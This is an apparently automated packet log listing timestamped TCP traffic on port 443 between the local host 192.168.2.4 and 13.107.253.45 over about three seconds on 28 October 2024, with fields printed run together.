                                                                                                                                                                            Oct 28, 2024 19:12:59.620914936 CET59249443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:59.621038914 CET59249443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:59.621052980 CET4435924913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:59.674108982 CET4435924713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:59.694843054 CET59247443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:59.694864035 CET4435924713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:59.698718071 CET59247443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:59.698724985 CET4435924713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:59.713597059 CET4435924513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:59.713663101 CET4435924513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:59.713735104 CET59245443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:59.714622021 CET59245443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:59.714622021 CET59245443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:59.714641094 CET4435924513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:59.714648962 CET4435924513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:59.720768929 CET4435924813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:59.722965956 CET59248443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:59.722990036 CET4435924813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:59.726941109 CET59248443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:59.726946115 CET4435924813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:59.737426996 CET59250443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:59.737471104 CET4435925013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:59.737642050 CET59250443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:59.737987995 CET59250443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:59.738001108 CET4435925013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:59.763184071 CET4435924613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:59.763223886 CET4435924613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:59.763279915 CET4435924613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:59.763286114 CET59246443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:59.763328075 CET59246443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:59.773192883 CET59246443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:59.773216963 CET4435924613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:59.773258924 CET59246443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:59.773263931 CET4435924613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:59.782289028 CET59251443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:59.782346010 CET4435925113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:59.782424927 CET59251443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:59.783257961 CET59251443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:59.783273935 CET4435925113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:59.830713987 CET4435924713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:59.830817938 CET4435924713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:59.830918074 CET59247443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:59.831242085 CET59247443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:59.831269026 CET4435924713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:59.831284046 CET59247443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:59.831291914 CET4435924713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:59.841283083 CET59252443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:59.841327906 CET4435925213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:59.843024969 CET59252443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:59.843642950 CET59252443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:59.843657970 CET4435925213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:59.867842913 CET4435924813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:59.867882013 CET4435924813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:59.867934942 CET59248443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:59.867943048 CET4435924813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:59.867988110 CET59248443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:59.868284941 CET59248443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:59.868309975 CET4435924813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:59.874236107 CET59253443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:59.874275923 CET4435925313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:59.874372959 CET59253443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:59.874620914 CET59253443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:59.874634027 CET4435925313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:00.417901039 CET4435924913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:00.418673992 CET59249443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:00.418732882 CET4435924913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:00.419214964 CET59249443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:00.419228077 CET4435924913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:00.497392893 CET4435925013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:00.497937918 CET59250443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:00.497953892 CET4435925013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:00.498452902 CET59250443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:00.498461962 CET4435925013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:00.541732073 CET4435925113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:00.542278051 CET59251443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:00.542310953 CET4435925113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:00.542747974 CET59251443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:00.542753935 CET4435925113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:00.559381008 CET4435924913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:00.559547901 CET4435924913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:00.559647083 CET59249443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:00.559915066 CET59249443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:00.559958935 CET4435924913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:00.559988976 CET59249443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:00.560005903 CET4435924913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:00.562838078 CET59255443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:00.562874079 CET4435925513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:00.562939882 CET59255443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:00.563143015 CET59255443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:00.563157082 CET4435925513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:00.605123997 CET4435925213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:00.605671883 CET59252443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:00.605700016 CET4435925213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:00.606141090 CET59252443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:00.606151104 CET4435925213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:00.634084940 CET4435925013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:00.634195089 CET4435925013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:00.634248018 CET59250443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:00.634394884 CET59250443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:00.634417057 CET4435925013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:00.634429932 CET59250443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:00.634438038 CET4435925013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:00.637252092 CET4435925313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:00.637691021 CET59253443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:00.637727976 CET4435925313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:00.637759924 CET59256443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:00.637792110 CET4435925613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:00.637933969 CET59256443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:00.638263941 CET59256443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:00.638276100 CET4435925613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:00.638277054 CET59253443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:00.638289928 CET4435925313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:00.683387041 CET4435925113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:00.683487892 CET4435925113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:00.683542967 CET59251443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:00.683789015 CET59251443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:00.683815002 CET4435925113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:00.683834076 CET59251443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:00.683850050 CET4435925113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:00.687072992 CET59257443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:00.687115908 CET4435925713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:00.687189102 CET59257443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:00.687397003 CET59257443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:00.687410116 CET4435925713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:00.766710043 CET4435925213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:00.766757011 CET4435925213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:00.766818047 CET59252443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:00.766829967 CET4435925213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:00.766902924 CET59252443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:00.767144918 CET59252443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:00.767165899 CET4435925213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:00.767177105 CET59252443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:00.767183065 CET4435925213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:00.771614075 CET59258443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:00.771648884 CET4435925813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:00.771730900 CET59258443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:00.771878004 CET59258443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:00.771888018 CET4435925813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:00.777411938 CET4435925313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:00.777481079 CET4435925313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:00.777535915 CET59253443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:00.777702093 CET59253443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:00.777729988 CET4435925313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:00.777740955 CET59253443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:00.777745962 CET4435925313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:00.780524969 CET59259443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:00.780559063 CET4435925913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:00.780620098 CET59259443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:00.780802011 CET59259443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:00.780813932 CET4435925913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:01.332396030 CET4435925513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:01.332963943 CET59255443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:01.332983971 CET4435925513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:01.334975958 CET59255443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:01.334980965 CET4435925513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:01.406058073 CET4435925613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:01.407130957 CET59256443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:01.407150030 CET4435925613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:01.409012079 CET59256443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:01.409018040 CET4435925613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:01.431969881 CET4435925713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:01.432416916 CET59257443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:01.432450056 CET4435925713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:01.432842970 CET59257443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:01.432852983 CET4435925713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:01.474093914 CET4435925513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:01.474121094 CET4435925513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:01.474165916 CET4435925513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:01.474194050 CET59255443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:01.474235058 CET59255443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:01.474494934 CET59255443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:01.474513054 CET4435925513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:01.474544048 CET59255443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:01.474549055 CET4435925513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:01.477508068 CET59260443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:01.477541924 CET4435926013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:01.477998972 CET59260443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:01.477998972 CET59260443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:01.478033066 CET4435926013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:01.545209885 CET4435925913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:01.546125889 CET4435925613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:01.546153069 CET59259443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:01.546186924 CET4435925913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:01.546303034 CET59259443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:01.546310902 CET4435925913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:01.546413898 CET4435925613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:01.546526909 CET59256443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:01.546526909 CET59256443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:01.546581030 CET59256443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:01.546591997 CET4435925613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:01.549283028 CET59261443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:01.549374104 CET4435926113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:01.549510002 CET59261443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:01.549612045 CET59261443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:01.549634933 CET4435926113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:01.552433014 CET4435925813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:01.553139925 CET59258443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:01.553139925 CET59258443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:01.553148985 CET4435925813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:01.553162098 CET4435925813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:01.570194006 CET4435925713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:01.570291042 CET4435925713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:01.570396900 CET4435925713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:01.570535898 CET59257443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:01.570535898 CET59257443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:01.570591927 CET59257443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:01.570611000 CET4435925713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:01.606983900 CET59262443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:01.607006073 CET4435926213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:01.607134104 CET59262443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:01.607774019 CET59262443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:01.607791901 CET4435926213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:01.684509039 CET4435925913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:01.684592009 CET4435925913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:01.684678078 CET59259443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:01.684906960 CET59259443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:01.684906960 CET59259443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:01.684931993 CET4435925913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:01.684946060 CET4435925913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:01.688163042 CET59263443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:01.688215017 CET4435926313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:01.688400030 CET59263443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:01.688808918 CET59263443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:01.688829899 CET4435926313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:01.692626953 CET4435925813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:01.692792892 CET4435925813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:01.693062067 CET59258443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:01.693229914 CET59258443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:01.693229914 CET59258443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:01.693243027 CET4435925813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:01.693250895 CET4435925813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:01.698972940 CET59264443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:01.698992014 CET4435926413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:01.702066898 CET59264443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:01.702179909 CET59264443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:01.702188969 CET4435926413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:02.235833883 CET4435926013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:02.242974997 CET59260443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:02.242995977 CET4435926013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:02.246974945 CET59260443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:02.246978998 CET4435926013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:02.299069881 CET4435926113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:02.301130056 CET59261443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:02.301172972 CET4435926113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:02.305360079 CET59261443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:02.305383921 CET4435926113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:02.356184959 CET4435926213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:02.381896973 CET4435926013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:02.382071018 CET4435926013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:02.382143021 CET59260443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:02.400850058 CET59262443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:02.437932968 CET4435926113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:02.438029051 CET4435926113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:02.438076973 CET4435926113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:02.438092947 CET59261443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:02.438137054 CET59261443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:02.456828117 CET4435926313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:02.464276075 CET4435926413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:02.491565943 CET59264443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:02.491583109 CET4435926413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:02.494015932 CET59264443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:02.494029045 CET4435926413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:02.494983912 CET59263443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:02.495017052 CET4435926313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:02.498922110 CET59263443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:02.498945951 CET4435926313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:02.499166012 CET59262443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:02.499180079 CET4435926213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:02.499520063 CET59262443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:02.499524117 CET4435926213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:02.499694109 CET59260443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:02.499708891 CET4435926013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:02.499717951 CET59260443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:02.499722004 CET4435926013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:02.505214930 CET59261443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:02.505248070 CET4435926113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:02.505265951 CET59261443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:02.505274057 CET4435926113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:02.510996103 CET59265443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:02.511048079 CET4435926513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:02.511109114 CET59265443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:02.511640072 CET59265443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:02.511657953 CET4435926513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:02.512818098 CET59266443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:02.512855053 CET4435926613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:02.512907982 CET59266443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:02.513104916 CET59266443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:02.513114929 CET4435926613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:02.629956007 CET4435926413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:02.630242109 CET4435926413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:02.630299091 CET59264443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:02.630548954 CET59264443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:02.630568981 CET4435926413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:02.630578995 CET59264443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:02.630584955 CET4435926413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:02.631015062 CET4435926213.107.253.45192.168.2.4
